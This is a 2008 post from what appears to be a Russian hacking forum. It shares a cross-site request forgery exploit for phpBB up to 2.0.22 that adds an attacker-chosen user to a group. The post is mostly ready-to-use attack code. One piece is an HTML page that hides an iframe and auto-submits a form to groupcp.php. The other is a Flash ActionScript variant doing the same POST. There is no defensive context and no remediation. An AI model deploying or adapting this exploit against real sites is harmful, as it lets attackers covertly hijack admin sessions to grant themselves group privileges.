21.05.2008, 22:11
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
С нами:
10752806
Репутация:
1202
|
|
PhpBB <= 2.0.22 CSRF Add User In Group
PhpBB <= 2.0.22 CSRF Add User In Group
www.hackinginside.altervista.org
Author: Vincy
Email: djvincy@hotmail.it
This CSRF add an user in a group.
Html Exploit By Vincy:
Код HTML:
<html>
<iframe name="hackinginside" frameborder="0" height="0" width="0"></iframe>
<form action="http://site.com/path/groupcp.php?g=[GROUP_ID]" method="post" name="vincy" target="hackinginside">
<input type="hidden" name="username" value="[YOUR_NAME]">
<input type="submit" name="add" value="Add Member"></form>
<script>document.vincy.submit()</script>
</html>
Flash Exploit By Nexen:
PHP код:
var username:String = "[YOUR_NAME]";
var add:String = "Add Member";
var g:String = "[GROUP_ID]";
getURL("http://site.com/path/groupcp.php?g=[GROUP_ID]", "_self", "POST");
|
|
|